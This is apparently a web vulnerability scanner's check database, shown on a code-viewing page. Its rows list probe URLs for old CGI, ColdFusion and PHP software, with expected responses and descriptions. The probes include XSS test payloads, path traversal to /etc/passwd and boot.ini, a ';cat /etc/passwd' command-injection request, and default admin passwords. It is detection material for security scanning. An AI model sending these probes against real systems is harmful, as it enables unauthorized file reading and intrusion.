📄 scan_database.db
字号:
"generic","/categorie.php3?cid=june","Unable to jump to row","GET","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.""generic","/catinfo","200","GET","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.""generic","/catinfo?<u><b>TESTING","<u><b>TESTING","GET","The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/cbms/cbmsfoot.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cbms/changepass.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cbms/editclient.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cbms/passgen.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cbms/realinv.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cbms/usersetup.php","200","GET","CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. none could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/""generic","/cfappman/index.cfm","200!not found","GET","susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm""generic","/cfcache.map","Mapping","GET","May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html""generic","/cfdocs/cfcache.map","Mapping","GET","May leak directory listing, may also leave server open to a DOS""generic","/cfdocs/cfmlsyntaxcheck.cfm","200!not found","GET","can be used for a DoS on the server by requesting it check all .exe's""generic","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files""generic","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files""generic","/cfdocs/examples/cvbeans/beaninfo.cfm","200!not found","GET","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm""generic","/cfdocs/examples/parks/detail.cfm","200!not found","GET","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm""generic","/cfdocs/expeval/displayopenedfile.cfm","200!not found","GET","Unknown vul""generic","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","boot loader","GET","Allows attacker to view arbitrary files.""generic","/cfdocs/expeval/openfile.cfm","200","GET!not found","Can use to expose the system/server path.""generic","/cfdocs/expeval/openfile.cfm","200","GET","Sample code shipped with ColdFusion may allow an attacker to verify the existance of files or directories outside the web server path, launch Denial of Service attacks, and more. CVE-1999-0924. Allaire ASB99-02 (http://www.macromedia.com/v1/handlers/index.cfm?ID=8739&Method=Full).""generic","/cfdocs/expeval/sendmail.cfm","200","GET!not found","can be used to send email; go to the page and fill in the form""generic","/cfdocs/snippets/evaluate.cfm","200","GET!not found","can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info""generic","/cfdocs/snippets/fileexists.cfm","200","GET!not found","can be used to verify the existance of files (on the same drive info as the web tree/file)""generic","/cfdocs/snippets/gettempdirectory.cfm","200!not found","GET","depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory""generic","/cfdocs/snippets/viewexample.cfm","200!not found","GET","this can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file (.cfm is assumed)""generic","/cfide/administrator/index.cfm","PasswordProvided","GET","Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314.""generic","/CFIDE/administrator/index.cfm","PasswordProvided","GET","ColdFusion Administrator for Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314.""generic","/cfide/Administrator/startstop.html","200","GET","can start/stop the server""generic","/CFIDE/probe.cfm","Error occured in:","GET","Cold Fusion MX Server reveals the file system path to the web root in error messages. Set 'Enable Robust Exception Information' on the 'Debugging Settings' page.""generic","/cgi-bin-sdb/printenv","/usr/bin/perl","GET","SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.""generic","/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E","alert(\"alert\")","GET","Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi","200","GET","Older versions of this CGI allow any user to change the administrator password.""generic","/cgi-bin/admin/admin.cgi","200","GET","May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.""generic","/cgi-bin/admin/setup.cgi","200","GET","May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.""generic","/cgi-bin/bigconf.cgi","200","GET","BigIP Configuration CGI""generic","/cgi-bin/common/listrec.pl","200","GET","This CGI allows attackers to execute commands on the host.""generic","/cgi-bin/handler","200","GET","comes with IRIX 5.3 - 6.4; allows to run arbitrary commands""generic","/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download","root:","GET","comes with IRIX 5.3 - 6.4; allows to run arbitrary commands""generic","/cgi-bin/MachineInfo","200","GET","gives out information on the machine (IRIX), including hostname""generic","/cgi-bin/pfdisplay.cgi","200","GET","comes with IRIX 6.2-6.4; allows to run arbitrary commands""generic","/cgi-bin/test2.pl?<script>alert('Vulnerable');</script>","<script>alert('Vulnerable')</script>","GET","Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/cgi-bin/webdist.cgi","200","GET","comes with IRIX 5.0 - 6.3; allows to run arbitrary commands""generic","/cgi-bin/wrap","200","GET","comes with IRIX 6.2; allows to view directories""generic","/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/cgi-local/cgiemail-1.4/cgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands.""generic","/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/cgi-local/cgiemail-1.6/cgicso?query=AAA","400 Required field missing: fingerhost","GET","This CGI allows attackers to execute remote commands.""generic","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","root:","GET","This CGI allows reading of remote files. CAN-2001-1019.""generic","/cgi-sys/addalink.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/cgiecho","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/cgiemail","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/countedit","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/domainredirect.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/entropybanner.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/entropysearch.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/FormMail-clone.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/helpdesk.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/mchat.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/randhtml.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/realhelpdesk.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/realsignup.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/scgiwrap","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi-sys/signup.cgi","200","GET","Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web""generic","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","[fonts]","GET","The ColdFusion install allows attackers to read arbitrary files remotely""generic","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","[fonts]","GET","The ColdFusion install allows attackers to read arbitrary files remotely""generic","/cgi/cgiproc?","200","GET","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.""generic","/cgis/wwwboard/wwwboard.cgi","200","GET","Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'.""generic","/cgis/wwwboard/wwwboard.pl","200","GET","Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'.""generic","/chassis/config/GeneralChassisConfig.html","Chassis Configuration","GET","The Cabletron switch may allow remote configuration, or data retrieval, through the web interface.""generic","/chat/!nicks.txt","200","GET","WF-Chat 1.0 Beta allows retrieval of user information.""generic","/chat/!pwds.txt","200","GET","WF-Chat 1.0 Beta allows retrieval of user information.""generic","/chat/data/usr","200","GET","SimpleChat! 1.3 allows retrieval of user information.""generic","/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","alert(\"Vulnerable\")</script>","GET","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.""generic","/class/mysql.class","This program is free software","GET","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.""generic","/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"","<script>alert(1)</script>","GET","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.""generic","/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>","<script>alert(1)</script>","GET","RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.""generic","/com","index of","GET","Java class files may be browsable.""generic","/COM","index of","GET","Java class files may be browsable.""generic","/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview","<script>alert('Vulnerable')</script>","GET","This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.""generic","/comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</scr
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -